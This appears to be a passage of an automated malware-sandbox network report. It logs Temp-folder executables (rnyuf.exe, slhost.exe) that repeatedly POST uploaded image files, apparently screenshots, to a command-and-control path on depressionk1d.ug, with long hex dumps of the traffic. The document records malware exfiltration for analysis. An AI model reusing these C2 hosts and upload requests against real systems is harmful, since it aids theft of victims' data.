                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:01.358215094 CET21176OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:01.358273029 CET21179OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:01.358314037 CET21181OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:27:01.358355999 CET21186OUTData Raw: 9e d5 46 63 04 92 5d bb 69 fa 9c e9 7d 10 4b bf 3e fd 5a 66 2a c1 95 95 c4 40 0c 63 1c ab 70 48 e2 ab df 25 dd ef f6 ac 8f 6a 15 b5 28 16 df 62 37 10 2a bc 6c b8 ce 73 81 18 5f c7 35 ce a5 8f d6 d7 fe 9e c7 47 2e 5d 75 7b 6f af ea ff 00 ae a7 43
                                                                                                                                                                                Data Ascii: Fc]i}K>Zf*@cpH%j(b7*ls_5G.]u{oCvicVvenb+]G8H*<H2I,$+xnGH=i;S'qzWqB}$(QFk)&\YAwSP+K4&GNVu~|x<RzxE=@RYTc$
                                                                                                                                                                                Nov 11, 2021 12:27:01.383574963 CET21189OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:27:01.439691067 CET21246INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:01 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                3192.168.2.54977552.216.1.8443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                30192.168.2.549833178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:02.243947983 CET21254OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94599
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:02.244215965 CET21254OUTData Raw: 2d 2d 2d 2d 2d 2d 39 61 62 39 38 38 34 39 64 37 37 30 31 62 61 34 35 33 34 39 66 33 32 35 38 61 64 31 31 38 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------9ab98849d7701ba45349f3258ad11878Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:02.244477034 CET21264OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:02.244699001 CET21267OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:02.269613981 CET21270OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:02.269750118 CET21276OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:02.269778013 CET21281OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:27:02.269808054 CET21284OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:27:02.269830942 CET21286OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:02.269876003 CET21288OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:27:02.269926071 CET21290OUTData Raw: 9e d5 46 63 04 92 5d bb 69 fa 9c e9 7d 10 4b bf 3e fd 5a 66 2a c1 95 95 c4 40 0c 63 1c ab 70 48 e2 ab df 25 dd ef f6 ac 8f 6a 15 b5 28 16 df 62 37 10 2a bc 6c b8 ce 73 81 18 5f c7 35 ce a5 8f d6 d7 fe 9e c7 47 2e 5d 75 7b 6f af ea ff 00 ae a7 43
                                                                                                                                                                                Data Ascii: Fc]i}K>Zf*@cpH%j(b7*ls_5G.]u{oCvicVvenb+]G8H*<H2I,$+xnGH=i;S'qzWqB}$(QFk)&\YAwSP+K4&GNVu~|x<RzxE=@RYTc$
                                                                                                                                                                                Nov 11, 2021 12:27:02.348803043 CET21353INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:02 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                31192.168.2.549837178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:02.956039906 CET21361OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94599
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:02.962372065 CET21361OUTData Raw: 2d 2d 2d 2d 2d 2d 39 61 62 39 38 38 34 39 64 37 37 30 31 62 61 34 35 33 34 39 66 33 32 35 38 61 64 31 31 38 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------9ab98849d7701ba45349f3258ad11878Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:02.962691069 CET21371OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:02.962985992 CET21374OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:02.987673998 CET21377OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:02.987762928 CET21387OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:02.987792969 CET21390OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:27:02.987803936 CET21393OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:02.987812996 CET21394OUTData Raw: 9f f0 45 be f0 e6 ad a6 d8 bd e5 dd b2 c7 0c 6e 91 c8 44 f1 b3 46 ec 09 0a ea 18 b2 b6 01 e0 80 47 7a ca 15 d1 6a 3a ce 9d a9 78 73 5e 96 2b 3f b0 ea 17 ba 85 ad c4 c8 f7 7e 67 9a d8 97 79 8d 76 82 a8 09 ce 3e 62 37 75 e9 5c ed 6d 46 a4 e7 75 35
                                                                                                                                                                                Data Ascii: EnDFGzj:xs^+?~gyv>b7u\mFu5k2pl@)(AGz)hRR(*QGz`-- )i)Z(N!E-7(!F)D>SE(5DSsFix4iDipDRR8SuR%PxZd4H<
                                                                                                                                                                                Nov 11, 2021 12:27:02.987943888 CET21399OUTData Raw: 9e d5 46 63 04 92 5d bb 69 fa 9c e9 7d 10 4b bf 3e fd 5a 66 2a c1 95 95 c4 40 0c 63 1c ab 70 48 e2 ab df 25 dd ef f6 ac 8f 6a 15 b5 28 16 df 62 37 10 2a bc 6c b8 ce 73 81 18 5f c7 35 ce a5 8f d6 d7 fe 9e c7 47 2e 5d 75 7b 6f af ea ff 00 ae a7 43
                                                                                                                                                                                Data Ascii: Fc]i}K>Zf*@cpH%j(b7*ls_5G.]u{oCvicVvenb+]G8H*<H2I,$+xnGH=i;S'qzWqB}$(QFk)&\YAwSP+K4&GNVu~|x<RzxE=@RYTc$
                                                                                                                                                                                Nov 11, 2021 12:27:03.012886047 CET21405OUTData Raw: 6f f1 d7 51 b5 b5 86 dd 34 4b 42 b1 22 a2 96 95 b2 40 18 e6 a4 ff 00 85 f9 aa 7f d0 12 cb fe fe bd 70 53 8d 7a 7f 0f 5f 4f c8 ed a8 e8 54 b7 37 4f 5f cc f4 c5 f0 64 97 93 a4 9a ee b3 75 a9 a4 67 2b 01 5f 2a 3c fb a8 27 3f a5 6e 6a ea b1 f8 7e fd
                                                                                                                                                                                Data Ascii: oQ4KB"@pSz_OT7O_dug+_*<'?nj~BH@a_@K/=NkgMFdlF?:*FO__m:0R$LQ(L@GzQLRQEffiE;R%JM%&4-/zJQ@04RQ@@Qi(=i6
                                                                                                                                                                                Nov 11, 2021 12:27:03.065802097 CET21459INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:03 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                32192.168.2.549841178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:03.592278004 CET21989OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94599
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:03.592361927 CET21989OUTData Raw: 2d 2d 2d 2d 2d 2d 39 61 62 39 38 38 34 39 64 37 37 30 31 62 61 34 35 33 34 39 66 33 32 35 38 61 64 31 31 38 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------9ab98849d7701ba45349f3258ad11878Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:27:03.592583895 CET21999OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:27:03.592715025 CET22002OUTData Raw: 18 22 87 65 ab 04 9b d8 c9 af 58 f8 4d e3 dd 0b c2 1a 3e a1 6f ab 4d 32 49 3d c0 74 58 a2 2f c0 5c 73 5e 71 67 a0 6b 5a 8b ba 59 68 fa 85 cb 22 23 ba c1 6a ee 55 5c 65 09 c0 e0 11 c8 3d c5 55 16 77 58 88 fd 96 7c 4d 21 8a 23 e5 9f 9d c6 32 a3 8e
                                                                                                                                                                                Data Ascii: "eXM>oM2I=tX/\s^qgkZYh"#jU\e=UwX|M!#2Hz(r]vx3~/?|=|uwqIer2`B=0iSL%\.Ccs+/cY>{k%OG$vx#A!R<W)k%%}
                                                                                                                                                                                Nov 11, 2021 12:27:03.617793083 CET22005OUTData Raw: b7 68 72 6a d7 d2 b4 7a 35 fe a5 1d 8e 9e 91 46 2f 2d 62 83 6a c5 89 96 36 9d 1e 2c 86 da 31 80 d8 ce 08 c1 07 8f f1 1d dd 9f f6 36 93 67 63 6d a7 42 48 b8 92 e5 60 f2 e5 95 18 4f 28 45 69 54 64 80 9b 71 ce 18 60 f3 c6 39 df 29 7f ba 29 42 01 d0
                                                                                                                                                                                Data Ascii: hrjz5F/-bj6,16gcmBH`O(EiTdq`9))BP+Zs<Z#cw)e%I-ii,aX')-(YDlC8$ngwEs{9Qu{m-nQREn`QE%Q@(9`G4sH( 0IE-
                                                                                                                                                                                Nov 11, 2021 12:27:03.617835999 CET22007OUTData Raw: 91 68 ef 49 45 30 17 34 a0 d3 69 68 4c 43 c3 53 d5 b9 a8 45 38 55 5c 96 89 b2 0d 05 41 a8 81 a5 04 d5 5c 56 1c 61 53 4c 36 fe 95 20 6a 70 6a 2c 98 af 24 56 30 b0 a6 94 23 b5 5d e0 d2 ec 53 4b 91 0f da 3e a6 79 14 a2 ae 98 54 d3 0d b7 71 4b d9 b2
                                                                                                                                                                                Data Ascii: hIE04ihLCSE8U\A\VaSL6 jpj,$V0#]SK>yTqK+b0M(.V)qF)bRKvR([P)qKiWb1L.7b1EqQ,#"TX.E.(.Q+S iZB#X9>Gmjqh;1I8ke'q(
                                                                                                                                                                                Nov 11, 2021 12:27:03.617849112 CET22010OUTData Raw: 5f 95 a7 f7 3b 9f 60 db 78 a7 42 b9 b7 49 97 56 b3 40 c3 3b 65 99 51 87 d4 13 9a c2 97 4e f0 7c 9a 7d fd aa 6b 16 50 c9 7d 72 6e a5 ba 8e e2 11 36 ff 00 37 cd 03 71 1c 80 c0 60 10 78 af 99 3f b4 2f 7f e7 f2 e3 fe fe b7 f8 d1 fd a1 7b ff 00 3f 97
                                                                                                                                                                                Data Ascii: _;`xBIV@;eQN|}kP}rn67q`x?/{?pZuo}AxONPMn[+5ldgebc1[(SY>NVc9/h^?Gw_,F=T}m8(Pp;+v*^u3ow(f_B
                                                                                                                                                                                Nov 11, 2021 12:27:03.617861986 CET22013OUTData Raw: 9e 59 4c ed ea ae 73 f3 0a e6 5a f2 ed ad ae ed bc d5 58 2e e5 59 a7 8d 63 55 0c eb bb 69 18 1f 28 1b db 81 81 cf d2 a6 7d 5b 52 92 7b a9 5a e5 4b 5d 5b 0b 59 57 ca 4d 86 21 b7 6a 85 c6 06 36 ae 30 01 04 64 73 4f d9 d4 e9 e5 ff 00 07 ef 77 f9 0b
                                                                                                                                                                                Data Ascii: YLsZX.YcUi(}[R{ZK][YWM!j60dsOwCvW^xum>#{Nnte!O-^2L1L&}FXA%#4nR#$1RN?-u/)Lrm_G60~ZKIX(,D^>GtrUiWz}:]e.
                                                                                                                                                                                Nov 11, 2021 12:27:03.617873907 CET22015OUTData Raw: 3b ce cf 6a 39 22 c3 9e 45 2d 8c 3b 1a 6e d3 e9 57 fc c5 3d 45 2f ee cf f0 d1 ec fc c3 da 3e c6 7f 39 a5 19 c5 68 79 51 1a 0d b4 47 bd 2f 64 c3 da a3 3e 96 ae 7d 8c 76 6a 4f b1 b7 63 47 b2 90 fd a4 4a 94 55 83 69 20 ed 4d 36 f2 0e c6 97 23 1a 9c
                                                                                                                                                                                Data Ascii: ;j9"E-;nW=E/>9hyQG/d>}vjOcGJUi M6#{T6iHJ1N(PS6(\1ERS!(PK@H)iF9-1F)iiJ4THZb)qKKLTM1NVa\n(?b1K~p^iXv(
                                                                                                                                                                                Nov 11, 2021 12:27:03.617902994 CET22018OUTData Raw: 16 32 74 14 e8 37 68 cf 47 ea b6 22 26 ba 7f 06 4b 21 96 fe 02 4f 92 60 de 47 60 c0 8c 7f 33 54 0e 8f a7 cb fb db 7f 10 69 fe 47 5f df 39 47 03 fd da e8 34 3f b0 c3 63 24 7a 73 bc d1 b3 62 5b 96 5d be 69 1d 94 7f 74 7f 3a f6 33 bc d3 0b 1c 0c d5
                                                                                                                                                                                Data Ascii: 2t7hG"&K!O`G`3TiG_9G4?c$zsb[]it:3uk]FR4k-c+s{|]5\D1r^)b~gJ]JZ+_hJ--e1]j6w]f7W:Dq0w\+
                                                                                                                                                                                Nov 11, 2021 12:27:03.617935896 CET22021OUTData Raw: 46 46 2b 23 64 02 31 c5 79 56 69 45 57 d5 a9 76 17 d6 2a 77 16 8a 28 ef 5b a3 01 69 29 69 28 62 12 90 d2 d1 40 c2 96 90 52 d0 80 29 69 29 68 10 a0 d2 d2 52 d3 13 0a 5a 4a 5a a1 0a 29 d4 d1 4b 40 98 b4 b4 94 a2 98 82 96 92 8a 60 3a 8a 4a 29 88 5a
                                                                                                                                                                                Data Ascii: FF+#d1yViEWv*w([i)i(b@R)i)hRZJZ)K@`:J)Z(ESi)A>)jHiN%ZbxcQUd!Ki8)VqE9j4lh-*OWUArU$MVpsOZ):e*SzpsO}PO
                                                                                                                                                                                Nov 11, 2021 12:27:03.696887970 CET22087INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:27:03 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                33192.168.2.549842178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:27:05.966438055 CET22324OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9ab98849d7701ba45349f3258ad11878
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 94599
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:27:05.966546059 CET22324OUTData Raw: 2d 2d 2d 2d 2d 2d 39 61 62 39 38 38 34 39 64 37 37 30 31 62 61 34 35 33 34 39 66 33 32 35 38 61 64 31 31 38 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------9ab98849d7701ba45349f3258ad11878Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
